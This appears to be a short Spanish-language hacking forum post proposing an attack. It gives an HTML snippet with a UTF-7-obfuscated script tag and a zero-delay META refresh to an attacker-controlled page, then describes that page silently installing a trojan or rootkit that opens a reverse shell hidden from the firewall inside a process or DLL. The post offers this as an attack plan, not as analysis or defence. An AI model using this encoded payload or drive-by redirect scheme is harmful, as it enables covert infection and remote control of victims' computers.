mi idea es por ejemplo utilizando un codigo asi:
<head>
<s+AGM-+AHI-+AGk-+AHA-+AHQ->
alert("XXX");
</s+AGM-+AHI-+AGk-+AHA-+AHQ->
</head>
<META HTTP-EQUIV="Refresh"CONTENT="0;url=http://www.xxx.com">
por ejemplo,te redirecciono a esta web desde mi server:
http://ciberia.ya.com/webmousehack/bugXXX6.htmllo de el alert es un detalle opcional, puedes poner ¨BIENVENIDO¨

ahora bien, te redireciono a mi web, que tiene el html con un exe injectado, que se instala de manera silenciosa, por ejemplo un troyano,rootkit o lo que sea...y con posterioridad me de una shell reversa sin que el firewall se entere e impida la conexion saliente, por ejemplo ocultando el malware en un proceso o una dll, etc
se entiende???
Salu2